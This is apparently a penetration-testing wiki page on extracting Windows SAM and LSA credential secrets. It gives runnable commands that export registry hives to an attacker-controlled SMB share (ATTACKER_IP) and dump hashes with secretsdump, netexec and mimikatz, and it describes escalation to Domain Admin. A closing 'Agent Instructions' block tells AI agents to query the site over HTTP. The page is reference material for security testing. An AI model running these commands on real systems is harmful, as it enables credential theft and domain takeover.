# SAM & LSA secrets
## Theory
In Windows environments, passwords are stored in a hashed format in registry hives like SAM (Security Account Manager) and SECURITY.
| Hive | Details | Format or credential material |
| -------- | -------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| SAM | stores locally cached credentials (referred to as SAM secrets) | LM or NT hashes |
| SECURITY | stores domain cached credentials (referred to as LSA secrets) | Plaintext passwords
LM or NT hashes
Kerberos keys (DES, AES)
Domain Cached Credentials (DCC1 and DCC2)
Security Questions (L$SQSA\)
|
| SYSTEM | contains enough info to decrypt SAM secrets and LSA secrets | N/A |
SAM and LSA secrets can be dumped either locally or remotely from the mounted registry hives. These secrets can also be extracted offline from the exported hives. Once the secrets are extracted, they can be used for various attacks, depending on the credential format.
| Credential material | Subsequent attacks |
| ---------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| Plaintext passwords | [credential spraying](/a-d/movement/credentials/bruteforcing/password-spraying.md), [stuffing](/a-d/movement/credentials/bruteforcing/stuffing.md), [shuffling](/a-d/movement/credentials/shuffling.md) or [silver tickets](/a-d/movement/kerberos/forged-tickets.md) |
| LM and NT hashes | [credential spraying](/a-d/movement/credentials/bruteforcing/password-spraying.md), [stuffing](/a-d/movement/credentials/bruteforcing/stuffing.md), [shuffling](/a-d/movement/credentials/shuffling.md), [cracking](/a-d/movement/credentials/cracking.md), [pass-the-hash](/a-d/movement/ntlm/pth.md) |
| Kerberos keys (RC4, i.e. == NT hash) | [credential cracking](/a-d/movement/credentials/cracking.md), [overpass-the-hash](/a-d/movement/kerberos/ptk.md) or [silver tickets](/a-d/movement/kerberos/forged-tickets.md) |
| Kerberos keys (DES, AES) | [credential cracking](/a-d/movement/credentials/cracking.md), [pass-the-key](/a-d/movement/kerberos/ptk.md) or [silver tickets](/a-d/movement/kerberos/forged-tickets.md) |
| Domain Cached Credentials (DCC1 or DCC2) | [credential cracking](/a-d/movement/credentials/cracking.md) |
## Practice
### Exfiltration
{% tabs %}
{% tab title="UNIX-like" %}
[Impacket](https://github.com/SecureAuthCorp/impacket)'s reg.py (Python) script can also be used to do the same operation remotely for a UNIX-like machine. For instance, this can be used to easily escalate from a [Backup Operator](/a-d/movement/domain-settings/builtin-groups.md) member to a Domain Admin by dumping a Domain Controller's secrets and use them for a [DCSync](/a-d/movement/credentials/dumping/dcsync.md).
{% hint style="success" %}
The attacker can start an SMB server, and indicate an UNC path including his IP address so that the hives get exported directly to his server.
{% endhint %}
```bash
# start an SMB share
smbserver.py -smb2support "someshare" "./"
# save each hive manually
reg.py "domain"/"user":"password"@"target" save -keyName 'HKLM\SAM' -o '\\ATTACKER_IPs\someshare'
reg.py "domain"/"user":"password"@"target" save -keyName 'HKLM\SYSTEM' -o '\\ATTACKER_IP\someshare'
reg.py "domain"/"user":"password"@"target" save -keyName 'HKLM\SECURITY' -o '\\ATTACKER_IP\someshare'
# backup all SAM, SYSTEM and SECURITY hives at once
reg.py "domain"/"user":"password"@"target" backup -o '\\ATTACKER_IP\someshare'
```
{% endtab %}
{% tab title="Live Windows" %}
When the Windows operating system is running, the hives are in use and mounted. The command-line tool named `reg` can be used to export them.
```bash
reg save HKLM\SAM "C:\Windows\Temp\sam.save"
reg save HKLM\SECURITY "C:\Windows\Temp\security.save"
reg save HKLM\SYSTEM "C:\Windows\Temp\system.save"
```
This operation can be conducted remotely with [BackupOperatoToDA](https://github.com/mpgn/BackupOperatorToDA) (C++).
{% hint style="success" %}
The attacker can start an SMB server, and indicate an UNC path including his IP address so that the hives get exported directly to his server.
{% endhint %}
```bash
BackupOperatorToDA.exe -d "domain" -u "user" -p "password" -t "target" -o "\\ATTACKER_IP\someshare"
```
{% hint style="info" %}
Alternatively, from a live Windows machine, the hive files can also be exfiltrated using [Volume Shadow Copy](/a-d/movement/credentials/dumping/ntds.md#volume-shadow-copy-vssadmin) like demonstrated for an NTDS export.
{% endhint %}
{% endtab %}
{% tab title="Down Windows" %}
When Windows is not running, the hives are not mounted and they can be copied just like any other file. This can be operated when mounting the hard drive from another OS (e.g. when booting the computer on another operating system). The hive files can be found at the following locations.
```bash
\system32\config\sam
\system32\config\security
\system32\config\system
```
{% endtab %}
{% endtabs %}
### Secrets dump
Here are some examples and tools that can be used for local/remote/offline dumping.
{% tabs %}
{% tab title="secretsdump" %}
[Impacket](https://github.com/SecureAuthCorp/impacket)'s [secretsdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) (Python) can be used to dump SAM and LSA secrets, either remotely, or from local files. For remote dumping, several authentication methods can be used like [pass-the-hash](/a-d/movement/ntlm/pth.md) (LM/NTLM), or [pass-the-ticket](/a-d/movement/kerberos/ptt.md) (Kerberos).
```bash
# Remote dumping of SAM & LSA secrets
secretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'
# Remote dumping of SAM & LSA secrets (pass-the-hash)
secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
# Remote dumping of SAM & LSA secrets (pass-the-ticket)
secretsdump.py -k 'DOMAIN/USER@TARGET'
# Offline dumping of LSA secrets from exported hives
secretsdump.py -security '/path/to/security.save' -system '/path/to/system.save' LOCAL
# Offline dumping of SAM secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL
# Offline dumping of SAM & LSA secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -security '/path/to/security.save' -system '/path/to/system.save' LOCAL
```
{% endtab %}
{% tab title="netexec" %}
[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) can be used to remotely dump SAM and LSA secrets, on multiple hosts. It offers several authentication methods like [pass-the-hash](/a-d/movement/ntlm/pth.md) (NTLM), or [pass-the-ticket](/a-d/movement/kerberos/ptt.md) (Kerberos)
```bash
# Remote dumping of SAM/LSA secrets
netexec smb $TARGETS -d $DOMAIN -u $USER -p $PASSWORD --sam/--lsa
# Remote dumping of SAM/LSA secrets (local user authentication)
netexec smb $TARGETS --local-auth -u $USER -p $PASSWORD --sam/--lsa
# Remote dumping of SAM/LSA secrets (pass-the-hash)
netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --sam/--lsa
# Remote dumping of SAM/LSA secrets (pass-the-ticket)
netexec smb $TARGETS --kerberos --sam/--lsa
```
{% endtab %}
{% tab title="Mimikatz" %}
[Mimikatz](https://github.com/gentilkiwi/mimikatz) can be used locally with [`lsadump::sam`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/sam) and [`lsadump::secrets`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/secrets) to extract credentials from `SAM` and `SECURITY` registry hives (and `SYSTEM` for the encryption keys), or offline with hive dumps.
```bash
# Local dumping of SAM secrets on the target
lsadump::sam
# Offline dumping of SAM secrets from exported hives
lsadump::sam /sam:'C:\path\to\sam.save' /system:'C:\path\to\system.save'
# Local dumping of LSA secrets on the target
lsadump::secrets
# Offline dumping LSA secrets from exported hives
lsadump::secrets /security:'C:\path\to\security.save' /system:'C:\path\to\system.save'
```
{% endtab %}
{% endtabs %}
{% hint style="info" %}
**Nota bene** secretsdump and netexec both extract security questions, if any, from the LSA. They are json formatted, UTF-16-LE encoded, and hex encoded on top of that.
{% endhint %}
## Resources
{% embed url="" %}
{% embed url="" %}
{% embed url="" %}
{% embed url="" %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://legacy.thehacker.recipes/a-d/movement/credentials/dumping/sam-and-lsa-secrets.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.